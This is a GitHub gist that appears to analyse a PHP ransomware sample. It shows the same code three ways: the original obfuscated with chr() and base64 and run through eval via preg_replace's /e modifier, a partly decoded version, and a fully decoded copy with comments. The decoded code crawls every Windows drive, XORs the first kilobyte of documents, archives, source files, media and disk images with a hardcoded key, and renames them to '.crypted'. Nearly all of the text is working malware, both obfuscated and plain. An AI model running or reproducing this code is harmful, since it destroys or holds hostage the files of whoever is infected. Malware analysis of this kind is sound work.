Create a gist now

Instantly share code, notes, and snippets.

@mbirth /a.php Secret
Last active Jul 8, 2016

<?php
$a651="pr".chr(101)."g_".chr(114)."eplac".chr(101);
$h772="eval(base64".chr(95)."d".chr(101)."code".chr(40).chr(34)."c2V0X3Rpb".chr(87).chr(86)."fbG".chr(108).chr(116)
.chr(97).chr(88)."QoMC".chr(107)."7".chr(68)."QoNCm".chr(90)."vc".chr(105)."gka".chr(84).chr(48)."2NzskaTw9OTA7JGkr"
.chr(75)."ykgaWYo".chr(81)."Gl".chr(122)."X".chr(50)."Rpcih".chr(106)."aHIoJG".chr(107)."pLi".chr(99)."6J".chr(121)
."kp".chr(73).chr(70).chr(82)."yZW".chr(85)."oY".chr(50)."hyKCRpKS4nOicpOw0K".chr(68)."Qpmd".chr(87)."5".chr(106)
."dGlvbi".chr(66).chr(85)."cmVlKCR".chr(119)."KQ0".chr(75)."e".chr(119)."0KCSRhPSdlJzsNCgkka".chr(122)."1iYX"
.chr(78)."lNjRfZ".chr(71)."V".chr(106).chr(98)."2Rl".chr(75)."CdN".chr(86)."0tUY".chr(110)."F".chr(89).chr(89)
."3pCQlV0Q0dP".chr(87)."TZy".chr(101)."HJC".chr(78)."lEyR".chr(85)."NvYUx".chr(86).chr(81)."0dI".chr(82)."Ek1"
.chr(81)."z".chr(85)."0UWFRSGlQNTAxMHE5".chr(79).chr(87).chr(49)."QUU".chr(53)."xQUtrTW".chr(116)."DdE".chr(78)
.chr(112)."Y1lz".chr(99).chr(122).chr(66)."1Q0".chr(78).chr(74)."RE".chr(104)."QY".chr(84).chr(86)."Ea".chr(85)
."1ERjZ3WWFqd".chr(107).chr(100)."GbW".chr(70)."LSk".chr(81)."0bX".chr(82)."zY0VW".chr(85)."1hQTFV1ZHVSU".chr(51)
."Rpd".chr(87)."cv".chr(97).chr(48)."NDb0E".chr(120)."NnN3Wlp".chr(50)."aTJjJy".chr(107)."7DQo".chr(74)."J".chr(72)
."M".chr(57).chr(89).chr(50)."hyK".chr(68).chr(107)."yKTsNCg0KC".chr(87).chr(108)."mKHB".chr(121)."ZW".chr(100)."f"
.chr(98)."WF0Y2goJy8n".chr(76)."iRzL".chr(105)."RzL".chr(105)."cod2".chr(108)."ub".chr(110)."R8Ym9v".chr(100)."Hx"
.chr(122)."eXN0ZW".chr(49)."8d2luZG9".chr(51)."c".chr(51)."x0".chr(98)."XB8".chr(100)."G".chr(86).chr(116).chr(99)
."H".chr(120)."w".chr(99)."m9".chr(110)."cmF".chr(116)."f".chr(71)."Fwc".chr(71)."RhdG".chr(70)."8YX".chr(66)."wb"
.chr(71)."ljYXRp".chr(98)."258".chr(99).chr(109)."9hbWluZ3x".chr(116)."c2".chr(57)."mZmljZX".chr(120)."0".chr(90)
."W1wb3J".chr(104)."cnl8Y".chr(50)."FjaGU".chr(112).chr(76).chr(50)."knLCR".chr(119).chr(75)."SB8".chr(102)."CBwcm"
.chr(86)."nX".chr(50)."1hdGNoKCc".chr(118)."c".chr(109)."VjeWNs".chr(90).chr(83)."9".chr(112)."Jywkc".chr(67)."k"
.chr(112)."IH".chr(74).chr(108)."dHVybjs".chr(78)."C".chr(103)."0KCSRk".chr(99)."D1Ab3Bl".chr(98)."mR".chr(112)."ci"
.chr(103).chr(107)."cCk7D".chr(81).chr(111)."NCglp".chr(90)."igkZHA9PT1".chr(109)."YWxz".chr(90)."SkgcmV0dXJuOw0K"
.chr(68)."QoJd2hp".chr(98)."GUoJG89QHJlYWRka".chr(88)."IoJGRwK".chr(83)."k".chr(103).chr(97).chr(87)."YoJG8hPScu"
.chr(74).chr(121)."Ym".chr(74)."G".chr(56)."hP".chr(83)."cuLi".chr(99)."pDQoJew0KC".chr(81)."lpZiAo".chr(81).chr(71)
."lzX".chr(50).chr(82)."pcigkcC4kcy4kby".chr(107)."pD".chr(81)."oJCX".chr(115).chr(78)."CgkJ".chr(67)."VRy".chr(90)
."WUoJHAuJH".chr(77)."u".chr(74).chr(71)."8p".chr(79)."w0".chr(75)."C".chr(81).chr(108)."9D".chr(81)."oJ".chr(67)
."WVsc2VpZ".chr(105)."A".chr(111)."J".chr(71)."E".chr(57)."PSdlJ".chr(121)."Ym".chr(99)."HJlZ19t".chr(89)."XRj"
.chr(97)."CgnL1suX".chr(83)."h6aX".chr(66)."8cmFyfH".chr(73)."w".chr(77).chr(72).chr(120)."yMDF8".chr(99)."j"
.chr(65).chr(121)."f".chr(72)."IwM3".chr(119)."3".chr(101)."nx0YXJ8Z3p".chr(56)."Z3ppcHx".chr(104)."cm".chr(78)
.chr(56)."YXJqfG".chr(74)."6f".chr(71)."J6Mnxie".chr(109)."F8Yn".chr(112).chr(112)."cHxieml".chr(119)."Mn".chr(120)
."p".chr(89)."2V8eGxzfHhs".chr(99)."3h8ZG9".chr(106).chr(102)."GRv".chr(89).chr(51)."h8cGRmfG".chr(82)."qdnV8"
.chr(90).chr(109)."Iyf".chr(72)."J0Z".chr(110)."x".chr(119)."cHR8cH".chr(66)."0eHxwc".chr(72)."N8".chr(99).chr(51)
."hpfG".chr(57).chr(107)."b".chr(88)."xvZH".chr(82).chr(56).chr(98)."XBw".chr(102)."HNzaHxwdWJ8Z3B".chr(110)."fHB"
.chr(110)."cHxrZ".chr(71)."J8a".chr(50)."Ri".chr(101)."HxhbH".chr(78)."8YXVwfGNwcnx".chr(117).chr(99).chr(72)
."J8Y3BwfGJhc3xhc218Y3".chr(78)."8cGhwfHBhc3xjb".chr(71)."Fz".chr(99)."3xweXxwbHx".chr(111).chr(102).chr(72)
."ZifHZjcH".chr(74).chr(118)."an".chr(120).chr(50)."YnB".chr(121)."b2".chr(112)."8amF2".chr(89)."XxiY".chr(87)."t8Y"
.chr(109)."Fja3VwfG1kYn".chr(120)."hY2NkYnx".chr(116)."Z".chr(71)."Z8b2".chr(82)."ifHdkYnxjc3Z8d".chr(72)."N2"
.chr(102)."HNxbHx".chr(119)."c2R8ZXBzf".chr(71)."Nkcnx".chr(106).chr(99)."HR8aW5kZ".chr(72)."xk".chr(100)."2d"
.chr(56)."YW".chr(108).chr(56).chr(99)."3".chr(90).chr(110)."fG1he".chr(72)."xza3B8c2".chr(78).chr(104)."ZH"
.chr(120)."jYWR8M2R".chr(122).chr(102)."GJsZW5".chr(107).chr(102)."Gx3".chr(98)."3xsd3N8bWJ8c2xkZHJ3f".chr(72)."Ns"
.chr(90)."GFzbXxzbGRwcnR8dTNkf".chr(71)."pw".chr(90)."3xqc".chr(71)."V".chr(110)."fH".chr(82)."pZmZ".chr(56)
."dGlmfHJhd3".chr(120)."hdml8".chr(98)."X".chr(66)."nfG1w".chr(78)."H".chr(120).chr(116)."NHZ8bXBl".chr(90)
."3xtcGV8d21m".chr(102).chr(72)."dtdnx2ZWd8bW92fDNncHxmb".chr(72)."Z8bWt2fH".chr(90)."vYnxyb".chr(88)."xtc".chr(68)
.chr(78).chr(56)."d".chr(50).chr(70)."2".chr(102)."G".chr(70)."zZ".chr(110)."x".chr(51)."bWF8bT".chr(78)."1fG1p"
.chr(90)."Gl".chr(56)."b2dnfG1pZHx2ZGl8".chr(100)."m1ka".chr(51).chr(120).chr(50)."aGR8".chr(90)."HNrfG".chr(108)
."t".chr(90)."3x".chr(112)."c28".chr(112)."JC9p".chr(74).chr(121)."wk".chr(98)."yk".chr(103)."fHwg".chr(74)
."GE9PSdkJy".chr(89).chr(109)."cHJ".chr(108)."Z".chr(49).chr(57)."tYXRjaCgnL1suX".chr(83).chr(104).chr(106)."cnlwd"
.chr(71).chr(86)."kKSQ".chr(118)."a".chr(83)."csJG8pKQ0KC".chr(81)."l".chr(55)."DQo".chr(74).chr(67)."QkkZnA"
.chr(57)."QGZvcGVuKCRwLi".chr(82)."zLiRvLCdy".chr(75).chr(121)."cpOw0KCQkJaWYgKCRmcCE".chr(57)."PWZhbHNl".chr(75)
."Q0KCQk".chr(74).chr(101)."w".chr(48).chr(75).chr(67)."QkJCS".chr(82)."4PUB".chr(109)."cmVhZCg".chr(107)."ZnA"
.chr(115)."MTAy".chr(78)."Ck".chr(55)."DQo".chr(74)."CQkJZm9yKCR".chr(112)."PTA7JGk8c3R".chr(121)."bGVuKCR4KT"
.chr(115)."kaSsrKSR".chr(52)."WyRpXT1jaHIob3JkKCR".chr(52).chr(87).chr(121)."RpXSleb3JkKCRrW".chr(121).chr(82)
."pJXN".chr(48)."cmxlb".chr(105)."gkayl".chr(100)."KS".chr(107)."7".chr(68).chr(81).chr(111)."JCQ".chr(107).chr(74)
."QGZzZWV".chr(114)."KCR".chr(109)."cC".chr(119)."wKTsNCg".chr(107)."JCQl".chr(65).chr(90).chr(110)."d".chr(121)
."aXRlKCR".chr(109)."cCwk".chr(101)."C".chr(107)."7DQo".chr(74).chr(67)."QkJQGZjbG9zZ".chr(83).chr(103)."kZnA"
.chr(112)."Ow0KDQoJC".chr(81).chr(107)."JaW".chr(89)."oJGE9".chr(80)."SdlJyk".chr(78)."CgkJCQ".chr(108).chr(55)
."DQo".chr(74)."CQkJCU".chr(66).chr(121)."ZW5hbWUo".chr(74)."HAuJHMu".chr(74)."G8sIC".chr(82)."wLiR".chr(122)."L"
.chr(105)."R".chr(118)."L".chr(105)."c".chr(117)."Y3J5c".chr(72)."R".chr(108).chr(90)."C".chr(99)."pOw0".chr(75)
."C".chr(81).chr(107)."J".chr(67)."X0NCgk".chr(74)."CQ".chr(108)."lb".chr(72)."NlDQoJ".chr(67)."QkJew".chr(48)
."KCQkJ".chr(67)."Q".chr(108)."Acm".chr(86)."uYW1".chr(108)."KCR".chr(119).chr(76)."iRzLiRvLCBwcm".chr(86)."n"
.chr(88)."3JlcG".chr(120)."hY2UoJ".chr(121).chr(57)."bLl1jcnlwd".chr(71).chr(86).chr(107)."JC8nLCA".chr(110)
."JywgJH".chr(65)."uJ".chr(72)."MuJG8p".chr(75).chr(84)."sNCgkJCQl".chr(57)."D".chr(81)."oJC".chr(81)."l".chr(57)
."D".chr(81)."o".chr(74)."C".chr(88)."0N".chr(67).chr(103)."l9DQoN".chr(67)."g".chr(108).chr(65)."Y2".chr(120)."v"
.chr(99).chr(50)."VkaX".chr(73)."oJ".chr(71).chr(82).chr(119)."KT".chr(115).chr(78)."C".chr(110)."0=".chr(34)
.chr(41).");";
$e51="/a3".chr(48).chr(54)."d93".chr(100)."aa".chr(57)."401".chr(99)."4baa17e618".chr(55)."1637b".chr(50)."/".chr(101);
preg_replace($e51,$h772,"a3".chr(48).chr(54)."d9".chr(51)."daa".chr(57)."40".chr(49).chr(99)."4b".chr(97)."a1".chr(55)."e6".chr(49)."87163".chr(55)."b2");
?>
<?php
$a651="preg_replace";
$h772="eval(base64_decode(\"c2V0X3RpbWVfbGltaXQoMCk7DQoNCmZvcigkaT02NzskaTw9OTA7JGkrKykgaWY"
."oQGlzX2RpcihjaHIoJGkpLic6JykpIFRyZWUoY2hyKCRpKS4nOicpOw0KDQpmdW5jdGlvbiBUcmVlKCRwKQ0"
."Kew0KCSRhPSdlJzsNCgkkaz1iYXNlNjRfZGVjb2RlKCdNV0tUYnFYY3pCQlV0Q0dPWTZyeHJCNlEyRUNvYUx"
."VQ0dIREk1QzU0UWFRSGlQNTAxMHE5OW1QUU5xQUtrTWtDdENpY1lzczB1Q0NJREhQYTVEaU1ERjZ3WWFqdkd"
."GbWFLSkQ0bXRzY0VWU1hQTFV1ZHVSU3RpdWcva0NDb0ExNnN3Wlp2aTJjJyk7DQoJJHM9Y2hyKDkyKTsNCg0"
."KCWlmKHByZWdfbWF0Y2goJy8nLiRzLiRzLicod2lubnR8Ym9vdHxzeXN0ZW18d2luZG93c3x0bXB8dGVtcHx"
."wcm9ncmFtfGFwcGRhdGF8YXBwbGljYXRpb258cm9hbWluZ3xtc29mZmljZXx0ZW1wb3Jhcnl8Y2FjaGUpL2k"
."nLCRwKSB8fCBwcmVnX21hdGNoKCcvcmVjeWNsZS9pJywkcCkpIHJldHVybjsNCg0KCSRkcD1Ab3BlbmRpcig"
."kcCk7DQoNCglpZigkZHA9PT1mYWxzZSkgcmV0dXJuOw0KDQoJd2hpbGUoJG89QHJlYWRkaXIoJGRwKSkgaWY"
."oJG8hPScuJyYmJG8hPScuLicpDQoJew0KCQlpZiAoQGlzX2RpcigkcC4kcy4kbykpDQoJCXsNCgkJCVRyZWU"
."oJHAuJHMuJG8pOw0KCQl9DQoJCWVsc2VpZiAoJGE9PSdlJyYmcHJlZ19tYXRjaCgnL1suXSh6aXB8cmFyfHI"
."wMHxyMDF8cjAyfHIwM3w3enx0YXJ8Z3p8Z3ppcHxhcmN8YXJqfGJ6fGJ6MnxiemF8YnppcHxiemlwMnxpY2V"
."8eGxzfHhsc3h8ZG9jfGRvY3h8cGRmfGRqdnV8ZmIyfHJ0ZnxwcHR8cHB0eHxwcHN8c3hpfG9kbXxvZHR8bXB"
."wfHNzaHxwdWJ8Z3BnfHBncHxrZGJ8a2RieHxhbHN8YXVwfGNwcnxucHJ8Y3BwfGJhc3xhc218Y3N8cGhwfHB"
."hc3xjbGFzc3xweXxwbHxofHZifHZjcHJvanx2YnByb2p8amF2YXxiYWt8YmFja3VwfG1kYnxhY2NkYnxtZGZ"
."8b2RifHdkYnxjc3Z8dHN2fHNxbHxwc2R8ZXBzfGNkcnxjcHR8aW5kZHxkd2d8YWl8c3ZnfG1heHxza3B8c2N"
."hZHxjYWR8M2RzfGJsZW5kfGx3b3xsd3N8bWJ8c2xkZHJ3fHNsZGFzbXxzbGRwcnR8dTNkfGpwZ3xqcGVnfHR"
."pZmZ8dGlmfHJhd3xhdml8bXBnfG1wNHxtNHZ8bXBlZ3xtcGV8d21mfHdtdnx2ZWd8bW92fDNncHxmbHZ8bWt"
."2fHZvYnxybXxtcDN8d2F2fGFzZnx3bWF8bTN1fG1pZGl8b2dnfG1pZHx2ZGl8dm1ka3x2aGR8ZHNrfGltZ3x"
."pc28pJC9pJywkbykgfHwgJGE9PSdkJyYmcHJlZ19tYXRjaCgnL1suXShjcnlwdGVkKSQvaScsJG8pKQ0KCQl"
."7DQoJCQkkZnA9QGZvcGVuKCRwLiRzLiRvLCdyKycpOw0KCQkJaWYgKCRmcCE9PWZhbHNlKQ0KCQkJew0KCQk"
."JCSR4PUBmcmVhZCgkZnAsMTAyNCk7DQoJCQkJZm9yKCRpPTA7JGk8c3RybGVuKCR4KTskaSsrKSR4WyRpXT1"
."jaHIob3JkKCR4WyRpXSleb3JkKCRrWyRpJXN0cmxlbigkayldKSk7DQoJCQkJQGZzZWVrKCRmcCwwKTsNCgk"
."JCQlAZndyaXRlKCRmcCwkeCk7DQoJCQkJQGZjbG9zZSgkZnApOw0KDQoJCQkJaWYoJGE9PSdlJykNCgkJCQl"
."7DQoJCQkJCUByZW5hbWUoJHAuJHMuJG8sICRwLiRzLiRvLicuY3J5cHRlZCcpOw0KCQkJCX0NCgkJCQllbHN"
."lDQoJCQkJew0KCQkJCQlAcmVuYW1lKCRwLiRzLiRvLCBwcmVnX3JlcGxhY2UoJy9bLl1jcnlwdGVkJC8nLCA"
."nJywgJHAuJHMuJG8pKTsNCgkJCQl9DQoJCQl9DQoJCX0NCgl9DQoNCglAY2xvc2VkaXIoJGRwKTsNCn0=\"));";
$e51="/a306d93daa9401c4baa17e61871637b2/e";
preg_replace($e51, $h772, "a306d93daa9401c4baa17e61871637b2");
?>
<?php
set_time_limit(0);
// Walk drives C: to Z:
for ($i=67; $i<=90; $i++) {
if (@is_dir(chr($i).':')) {
Tree(chr($i).':');
}
}
function Tree($p)
{
$a='e'; // e = encrypt, d = decrypt
// the encryption key:
$k=base64_decode('MWKTbqXczBBUtCGOY6rxrB6Q2ECoaLUCGHDI5C54QaQHiP5010q99mPQNqAKkMkCtCicYss0uCCIDHPa5DiMDF6wYajvGFmaKJD4mtscEVSXPLUuduRStiug/kCCoA16swZZvi2c');
$s=chr(92); // backslash character (\)
// Folders matching those are ignored/skipped
if (preg_match('/'.$s.$s.'(winnt|boot|system|windows|tmp|temp|program|appdata|application|roaming|msoffice|temporary|cache)/i',$p) || preg_match('/recycle/i',$p)) {
return;
}
$dp=@opendir($p);
if ($dp===false) {
return;
}
while ($o=@readdir($dp))
{
if ($o!='.' && $o!='..') {
if (@is_dir($p.$s.$o)) {
Tree($p.$s.$o);
} elseif ($a=='e' && preg_match('/[.](zip|rar|r00|r01|r02|r03|7z|tar|gz|gzip|arc|arj|bz|bz2|bza|bzip|bzip2|ice|xls|xlsx|doc|docx|pdf|djvu|fb2|rtf|ppt|pptx|pps|sxi|odm|odt|mpp|ssh|pub|gpg|pgp|kdb|kdbx|als|aup|cpr|npr|cpp|bas|asm|cs|php|pas|class|py|pl|h|vb|vcproj|vbproj|java|bak|backup|mdb|accdb|mdf|odb|wdb|csv|tsv|sql|psd|eps|cdr|cpt|indd|dwg|ai|svg|max|skp|scad|cad|3ds|blend|lwo|lws|mb|slddrw|sldasm|sldprt|u3d|jpg|jpeg|tiff|tif|raw|avi|mpg|mp4|m4v|mpeg|mpe|wmf|wmv|veg|mov|3gp|flv|mkv|vob|rm|mp3|wav|asf|wma|m3u|midi|ogg|mid|vdi|vmdk|vhd|dsk|img|iso)$/i',$o)
|| $a=='d' && preg_match('/[.](crypted)$/i',$o)) { // if mode=encryption and one of those extensions, or mode=decryption and extension=crypted
$fp=@fopen($p.$s.$o,'r+');
if ($fp!==false) {
$x=@fread($fp,1024);
for ($i=0; $i<strlen($x); $i++) {
// each byte is XOR'd with the respective key character at that point (XOR cipher)
$x[$i]=chr(ord($x[$i]) ^ ord($k[$i%strlen($k)]));
}
@fseek($fp, 0); // seek to 0 in same file to have it modified in place (no undelete possible)
@fwrite($fp, $x);
@fclose($fp);
if($a=='e') {
// if we're encrypting, rename to .crypted
@rename($p.$s.$o, $p.$s.$o.'.crypted');
} else {
// if we're decrypting, rename back
@rename($p.$s.$o, preg_replace('/[.]crypted$/', '', $p.$s.$o));
}
}
}
}
}
@closedir($dp);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment